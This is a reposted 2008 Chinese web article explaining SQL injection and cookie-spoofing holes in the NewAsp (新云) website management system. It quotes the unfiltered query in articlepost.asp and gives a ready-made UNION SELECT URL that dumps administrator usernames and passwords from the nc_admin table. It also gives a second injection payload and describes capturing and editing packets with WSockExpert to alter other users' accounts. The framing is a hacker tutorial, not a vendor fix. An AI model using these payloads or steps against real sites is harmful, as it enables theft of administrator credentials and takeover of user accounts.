黑客教你新云网站管理系统文件注入漏洞

2008-02-23 07:03:38来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

关于新云

新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册空间租用等多项业务,为企业打造卓越的网络应用平台。

漏洞原理

利用各种方法实现入侵,如COOKIES、抓包、注入检测等。

1.过滤未全

user\articlepost.asp 文件第333行

Quote 

SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from 

NC_Article where ChannelID=" & ChannelID & " And username=’" & Newasp.MemberName & "’ 

And ArticleID=" & Request("ArticleID")

没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:

articlepost.asp?ChannelID=1&action=view&ArticleID=1 union select%

201,2,3,4,5,username,password,8,9 from nc_admin

注册后直接在浏览器上输入,就可以爆出管理员的表和代码。

2.新云2.1SQL版注入漏洞

漏洞描述:

动画频道的“动画管理”和“审核管理”,错误类型:

Quote 

Microsoft OLE DB Provider for SQL Server (0x80040E14) 

未能找到存储过程 ’NC_FlashAdminList’。 

/admin/admin_Flash.asp, 第 233 行

可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:

articlepost.asp?ChannelID=1&action=view&ArticleID=1;--

3.COOKIES欺骗获取管理账号

攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:直播:第三周实用网络技术在线学习答疑

下一篇:执行文件方式加密FLASH文件的解密方法